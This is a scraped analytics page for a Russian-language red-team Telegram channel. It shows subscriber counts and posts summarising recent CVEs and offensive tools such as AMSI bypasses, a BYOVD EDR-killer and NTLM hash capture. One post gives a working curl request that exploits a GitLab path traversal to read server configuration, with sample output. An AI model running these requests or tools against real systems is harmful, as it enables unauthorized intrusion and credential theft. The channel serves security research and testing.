en
Feedback
Whitehat Lab

Whitehat Lab

Open in Telegram

Авторский канал об информационной безопасности Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое Edu only Автор: @exited3n

Show more
3 163
Subscribers
No data24 hours
+277 days
+6530 days

Data loading in progress...

Similar Channels
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
September '26
September '26
+90
in 0 channels
August '26
+106
in 1 channels
Get PRO
July '26
+196
in 4 channels
Get PRO
June '26
+109
in 3 channels
Get PRO
May '26
+104
in 2 channels
Get PRO
April '26
+183
in 5 channels
Get PRO
March '26
+262
in 7 channels
Get PRO
February '26
+258
in 3 channels
Get PRO
January '26
+358
in 2 channels
Get PRO
December '25
+108
in 5 channels
Get PRO
November '25
+123
in 1 channels
Get PRO
October '25
+208
in 2 channels
Get PRO
September '25
+133
in 2 channels
Get PRO
August '25
+232
in 5 channels
Get PRO
July '25
+201
in 6 channels
Get PRO
June '25
+156
in 4 channels
Get PRO
May '25
+841
in 4 channels
Date
Subscriber Growth
Mentions
Channels
19 September+5
18 September+1
17 September+3
16 September+5
15 September+4
14 September+8
13 September+8
12 September+8
11 September+1
10 September+15
09 September+4
08 September+1
07 September+6
06 September+2
05 September+3
04 September+5
03 September+5
02 September+3
01 September+3
Channel Posts
💻 CVE-2026-49179: Active Directory WriteSPNScript Command Injection Компонент (ntdsai.dll - WriteSPNScript function) Active Directory формирует команду на основе внешних данных, но не экранирует или некорректно экранирует специальные символы (8.8 по CVSS 3.1) Для эксплуатации подойдет любой аутентифицированный пользователь, как импакт RCE от системы на DC Уязвимы:
Windows Server с 2012 по 2025
💻 PoC #cve #windows #ad #poc ✈️ Telegram 💬 MAX

2
cups2root Linux LPE Interactive root shell from a local account in the lpadmin group.
cups2root Linux LPE Interactive root shell from a local account in the lpadmin group.
266
3
⚙️ CDP Toolkit Инструмент для работы через Chrome DevTools Protocol (CDP) Beacon Object File (BOF) для активации CDP - CDP-En
⚙️ CDP Toolkit Инструмент для работы через Chrome DevTools Protocol (CDP) Beacon Object File (BOF) для активации CDP - CDP-Enable-BOF It is built for penetration testing and red team workflows where you have access to a running browser's CDP endpoint and want to inspect browser state, collect artifacts, or browse through the user's browser context 🐱 Repo 🔗 Research #cdp #chrome #devtools #redteam ✈️ Telegram 💬 MAX
540
4
💀 go-responder NTLMv2 hash capture tool in pure Go zero deps, single static binary. Poisons LLMNR / NBT-NS / mDNS and captur
💀 go-responder NTLMv2 hash capture tool in pure Go zero deps, single static binary. Poisons LLMNR / NBT-NS / mDNS and captures over SMB, HTTP, FTP, LDAP, MSSQL, Kerberos and more 🐱 Git repo
562
5
✅ AMSI.fail Генератор AMSI bypass'ов AMSI (Antimalware Scan Interface) is a Windows interface that allows applications and se
✅ AMSI.fail Генератор AMSI bypass'ов AMSI (Antimalware Scan Interface) is a Windows interface that allows applications and services to scan script content for malicious usage. If a signature is registered by the AMSI antimalware service provider (Windows Defender by default), it will be blocked 🔗 https://amsi.fail 🐱 Repo #amsi #bypass #windows ✈️ Telegram 💬 MAX
639
6
💻 0xM0nCrush v0.1.0 В дополнение к посту про BYOVD Kernel-mode process terminator using a signed BYOVD driver. Works on all
💻 0xM0nCrush v0.1.0 В дополнение к посту про BYOVD Kernel-mode process terminator using a signed BYOVD driver. Works on all Windows 10/11 The tool is a single self-contained executable. It installs the driver through the Service Control Manager, performs the kill, then stops and deletes the service, leaving no persistent artifact behind. Targets are configurable at runtime through a config file, command line, or the built-in defaults 🐱 Repo #byovd #windows #rust #kernel ✈️ Telegram 💬 MAX
694
7
⚙ Bring Your Own Vulnerable Driver Коллекция PoC'ов, демонстрирующих, как уязвимые драйверы могут быть использованы для отклю
⚙ Bring Your Own Vulnerable Driver Коллекция PoC'ов, демонстрирующих, как уязвимые драйверы могут быть использованы для отключения AV/EDR Техника, при которой атакующий использует легитимный драйвер с действительной цифровой подписью, содержащий известную уязвимость, для получения несанкционированного доступа к режиму ядра операционной системы 🐱 Repo 🔗 Living Off The Land Drivers 📝 Хабр #BYOVD #drivers #windows #redteam #av #edr #poc ✈️ Telegram 💬 MAX
756
8
😥 CVE-2026-55040 Неправильная проверка JWT в SharePoint Server Subscription Edition приводит к произвольному входу в учетную
😥 CVE-2026-55040 Неправильная проверка JWT в SharePoint Server Subscription Edition приводит к произвольному входу в учетную запись By leveraging CVE-2026-55040, a remote unauthenticated attacker can assume the identity of any SharePoint site user; the prerequisite is the attacker must know in advance the user they wish to identify as. This can be achieved in a number of ways, including via a user’s Active Directory (AD) Security ID (SID), or via a user’s AD User Principal Name (UPN) 🔗 Research 🔗 Rapid7 research 🐱 PoC #cve #poc #sharepoint #windows #jwt ✈️ Telegram 💬 MAX
905
9
📄 Доклады с конференции Black Hat USA 2026 The premier cybersecurity event of the year returns to Mandalay Bay with a re-eng
📄 Доклады с конференции Black Hat USA 2026 The premier cybersecurity event of the year returns to Mandalay Bay with a re-engineered, six-day program built to ignite innovation, push boundaries, and bring the global security community together like never before 🐱 Slides #blackhat #blackhatusa ✈️ Telegram 💬 MAX
963
10
⚙️ CVE-2026-85706 - GitLab CE/EE unauthenticated arbitrary file read Критическая (CVSS 10.0) уязвимость в GitLab, которая поз
⚙️ CVE-2026-85706 - GitLab CE/EE unauthenticated arbitrary file read Критическая (CVSS 10.0) уязвимость в GitLab, которая позволяет неавторизованному пользователю читать произвольные файлы на сервере Path traversal в API коммитов репозитория. В уязвимых версиях API не убирает последовательности обхода (например, ../ или их кодированные варианты), что позволяет выйти за пределы нужного каталога и добраться до файловой системы сервера Уязвимы: 🐥 8.7 до 19.1.7 включительно 🐥 19.2 до 19.2.5 включительно 🐥 19.3 до 19.3.1 включительно Ручная проверка: curl -sk -X POST \ "https://gitlab.example.com/api/v4/projects/35/repository/commits/?file=&file.path=%2Fopt%2Fgitlab%2Fembedded%2Fservice%2Fgitlab-rails%2Fconfig%2Fgitlab.yml&file.size=1&Content-Type=application/x-www-form-urlencoded" Уязвимый инстанс вернет примерно следующее: {"message":"400 Bad request - Invalid parameter: invalid %-encoding (## GitLab settings\n gitlab:\n host: gitlab.example.com\n ... )"} Тестовая лаба: services: gitlab: image: gitlab/gitlab-ce:19.3.1-ce.0 container_name: cve-2026-85706-gitlab hostname: gitlab.lab restart: "no" shm_size: "256m" ports: - "127.0.0.1:8929:80" # web / API - "127.0.0.1:2224:22" # ssh (optional) environment: GITLAB_OMNIBUS_CONFIG: | external_url 'http://127.0.0.1:8929' gitlab_rails['initial_root_password'] = 'CVE-2026-85706-Lab!' prometheus_monitoring['enable'] = false gitlab_rails['log_level'] = 'info' volumes: - gitlab-config:/etc/gitlab - gitlab-logs:/var/log/gitlab - gitlab-data:/var/opt/gitlab volumes: gitlab-config: gitlab-logs: gitlab-data: docker compose -f docker-compose.yml up -d 🐱 PoC 🔗 Patch Release #cve #poc #gitlab ✈️ Telegram 💬 MAX
1 119
11
🐕 IAMhounddog v1.1.0 A tool to help pentesters quickly identify privileged principals and second-order privilege escalation
🐕 IAMhounddog v1.1.0 A tool to help pentesters quickly identify privileged principals and second-order privilege escalation opportunities in unfamiliar AWS environments 💻 Repo #bhce #aws #pentest ✈️ Telegram 💬 MAX
832
12
💻 AWSHound Collects AWS IAM/authorization data and builds a BloodHound OpenGraph Установка в BH CE: Administration → Early A
💻 AWSHound Collects AWS IAM/authorization data and builds a BloodHound OpenGraph Установка в BH CE: Administration → Early Access Features and enable OpenGraph Extension Management if it is present and switched off Administration → OpenGraph Management and upload schema/schema.json Check the extension appears as AWS (AWSHound), namespace AWS, at the version you expect Quick Upload, and upload graph.zip File Ingest, and wait for ingest and analysis to finish 🐱 Repo #awshound #bhce #aws ✈️ Telegram 💬 MAX
987
13
🔄 🏃 adPEAS v2.5.0 Отличный инструмент для поиска и сбора информации в 💻 Active Directory Самый большой релиз с 2.0 версии:
🔄 🏃 adPEAS v2.5.0 Отличный инструмент для поиска и сбора информации в 💻 Active Directory Самый большой релиз с 2.0 версии: 5 новых проверок, 16 дополнений, 138 исправлений Подробнее Стандартный запуск: Import-Module .\adPEAS.ps1 Invoke-adPEAS Доступные модули: Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках Rights - поиск различных прав, например LAPS, DCSync и т.д. GPO - базовая информация о групповых политиках ADCS - информация о центрах сертификации Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д. Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей Accounts - информация об аккаунтах Computer - AD DS, AD CS, Exchange серверы и т.д. BloodHound - сборщик данных для BH Варианты запуска: Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com' Определенная УЗ: $SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword) Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred Модули: Invoke-adPEAS -Module Domain Invoke-adPEAS -Module Rights Invoke-adPEAS -Module GPO Invoke-adPEAS -Module ADCS Invoke-adPEAS -Module Creds Invoke-adPEAS -Module Delegation Invoke-adPEAS -Module Accounts Invoke-adPEAS -Module Computer Invoke-adPEAS -Module Bloodhound -Scope All 🐱 Home #soft #powershell #ad #enumeration ✈️ Telegram 💬 MAX
997
14
⚙️ CVE-2026-19490 - Citrix NetScaler ADC/Gateway Authentication Bypass Критическая уязвимость в продуктах Citrix NetScaler AD
⚙️ CVE-2026-19490 - Citrix NetScaler ADC/Gateway Authentication Bypass Критическая уязвимость в продуктах Citrix NetScaler ADC и NetScaler Gateway, которая позволяет атакующему, не прошедшему аутентификацию, обойти механизм проверки подлинности. Опасность в том, что устройства NetScaler часто располагаются на периметре сети и обеспечивают удалённый доступ, компрометация такого устройства открывает прямой путь во внутреннюю сеть Unauthenticated session forgery on Citrix NetScaler ADC / NetScaler Gateway via the SAML HTTP-Redirect binding handler at GET /cgi/samlauth. CVSS 4.0 9.3, CWE-288. Bulletin CTX696939 (2026-08-19), no workarounds Что делать: Немедленно обновить все уязвимые устройства до версий 14.1-73.32 (для ветки 14.1) или 13.1-63.21 (для ветки 13.1) 🔗 Research 🐱 PoC #cve #poc #citrix ✈️ Telegram 💬 MAX
1 053
15
⚙ CVE‑2026‑65643 - cPanel Domain Parking RCE Серьезная уязвимость (CVSS 8.7) в популярной управлялке веб хостингом cPanel/WHM
⚙ CVE‑2026‑65643 - cPanel Domain Parking RCE Серьезная уязвимость (CVSS 8.7) в популярной управлялке веб хостингом cPanel/WHM, при определенных условиях позволяет одному клиенту получить root права на физическом сервере Critical command injection vulnerability in cPanel & WHM versions 11.x that allows an authenticated cPanel user to execute arbitrary system commands with root privileges via the domain parking functionality Уязвимы: 11.110.0.140 и ниже 11.134.0.52 и ниже 11.136.0.36 и ниже 11.138.0.1 и ниже 🐱 Toolkit #cve #cpanel #whm #rce #poc ✈️ Telegram 💬 MAX
1 083
16
⚙️ Living Off the Living Off the Land Сборник всевозможных Living Off the Land A single, searchable directory of the communit
⚙️ Living Off the Living Off the Land Сборник всевозможных Living Off the Land A single, searchable directory of the community's Living-Off-the-Land security research - every LOLBin, LOLDriver, and adjacent project, indexed and cross-referenced by platform and focus area 🔗 https://lolol.farm #lolbin #lolfarm #lolbas #gtfo ✈️ Telegram 💬 MAX
1 075
17
👍 Выпуск №11, август 2026 🗂 Download ✈️ Backconnect #magazine #backconnect ✈️ Telegram 💬 MAX
👍 Выпуск №11, август 2026 🗂 Download ✈️ Backconnect #magazine #backconnect ✈️ Telegram 💬 MAX
1 107
18
🗳 VMware threat emulation techniques Методы атак для эмуляции угроз в средах VMware A comprehensive collection of 80+ indivi
🗳 VMware threat emulation techniques Методы атак для эмуляции угроз в средах VMware A comprehensive collection of 80+ individual attacker actions that can be simulated against VCF environments in Purple Team exercises 🐱 Repo 🔗 Web #vmware #esxi ✈️ Telegram 💬 MAX
1 160
19
🔄🐕 RustHound-CE 2.5.7 Cross-platform and cross-compiled BloodHound collector tool written in Rust, making it compatible wit
🔄🐕 RustHound-CE 2.5.7 Cross-platform and cross-compiled BloodHound collector tool written in Rust, making it compatible with Linux, Windows, and macOS. It therefore generates all the JSON files that can be analyzed by BloodHound Community Edition Работает с BloodHound-CE Установка: # Install from cargo cargo install rusthound-ce Сбор: rusthound-ce -i 192.168.1.10 -d domain.local -u user@domain.local -p 'pass' -z 🖥 Repo #rusthound #soft #bloodhound #rust ✈️ Telegram 💬 MAX
1 171
20
💻 ADPathFinder 1.2.0 Инструмент для построения путей атак в домене через BloodHound CE, также покрывает AD CS, MSSQL, SCCM, трасты и т.д. 🔗 Research ADPathFinder is an attack mapping tool for pentesters and red teamers. It analyses SharpHound data and unifies it with OpenGraph plugins to surface attack paths to high-value targets such as Domain Admins and Domain Controllers, starting from low-privileged users and computers 🐱 Repo 📚 Wiki #windows #adpathfinder #soft ✈️ Telegram 💬 MAX
1 223